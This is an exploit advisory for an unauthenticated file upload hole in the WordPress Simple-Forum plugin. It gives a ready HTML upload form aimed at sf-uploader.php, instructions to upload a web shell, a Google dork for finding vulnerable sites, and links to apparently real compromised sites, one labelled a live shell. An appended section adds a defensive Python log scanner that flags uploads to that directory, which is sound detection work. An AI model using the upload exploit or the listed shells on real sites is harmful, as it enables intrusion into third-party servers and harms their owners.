
WordPress Simple-Forum Plugin Remote File Upload Vulnerability

Author: X-Bruno, Published: 05-10-2014
############################################################################
# Title : WordPress Simple-Forum Plugin Remote File Upload Vulnerability

# Author : X-Bruno

# Date : 10/05/2014

# Facebook : http://www.facebook.com/Inj3ct.Bruno

# Email: agiadx338@yahoo.com

# Vendor : www.wordpress.org

# Google Dork : inurl:/wp-content/plugins/simple-forum/

# Tested on : Linux
############################################################################

=== > Exploit :

<form enctype="multipart/form-data"

action="localhost/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">

<input type="jpg" name="url" value="./" />

Please choose a file: <input name="uploadfile" type="file" />

<input type="submit" value="upload" />


------ > save this code as *.htm , html and open the file with browser

------> select shell from your computer and upload & Enjoy .



Shell Access ==== > http://localhost/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php


Examples :

1 - http://www.theultimatespaceship.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php

2 - (Live shell) http://music4you.ie/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/help.php
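
For defenders, a log check built on the paths above. This is an added example, not part of the original advisory. It flags POSTs to sf-uploader.php and requests for any other script served from the same ajaxupload directory (as help.php is in example 2). The combined log format, the sample log lines and the assumption that sf-uploader.php is the only script expected in that directory are mine.

```python
import re
from urllib.parse import unquote, urlsplit

# Directory from the advisory; its examples show uploaded scripts served from it.
UPLOAD_DIR = "/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/"
UPLOADER = "sf-uploader.php"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
# Combined log format: ip, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan(lines):
    """Return (kind, ip, time, path, status) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format access log line
        ip, when, method, target, status = m.groups()
        # Drop the query string and decode %xx so encoded names still match.
        path = unquote(urlsplit(target).path)
        lower = path.lower()
        if UPLOAD_DIR not in lower:
            continue
        name = lower.rsplit("/", 1)[-1]
        if name == UPLOADER and method == "POST":
            findings.append(("upload-post", ip, when, path, int(status)))
        elif name != UPLOADER and SCRIPT_EXT.search(name):
            # Assumption: sf-uploader.php is the only script expected here.
            findings.append(("unexpected-script", ip, when, path, int(status)))
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
_T = "[10/May/2014:10:01:09 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {_T} "GET {UPLOAD_DIR}sf-uploader.php HTTP/1.1" 200 12',
    f'203.0.113.7 - - {_T} "POST {UPLOAD_DIR}sf-uploader.php HTTP/1.1" 200 31',
    f'203.0.113.7 - - {_T} "GET {UPLOAD_DIR}help.php?x=1 HTTP/1.1" 200 4096',
    f'198.51.100.4 - - {_T} "GET {UPLOAD_DIR}ajaxupload.js HTTP/1.1" 200 900',
    f'198.51.100.4 - - {_T} "GET /index.php HTTP/1.1" 200 5000',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

An "upload-post" hit followed by an "unexpected-script" hit with a 200 status from the same address is the pattern to triage first.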


#################################################################



# Greeting : Syria 3> , Palestine , DR.SHA6H , SRS TEAM , MadLeets #



#################################################################
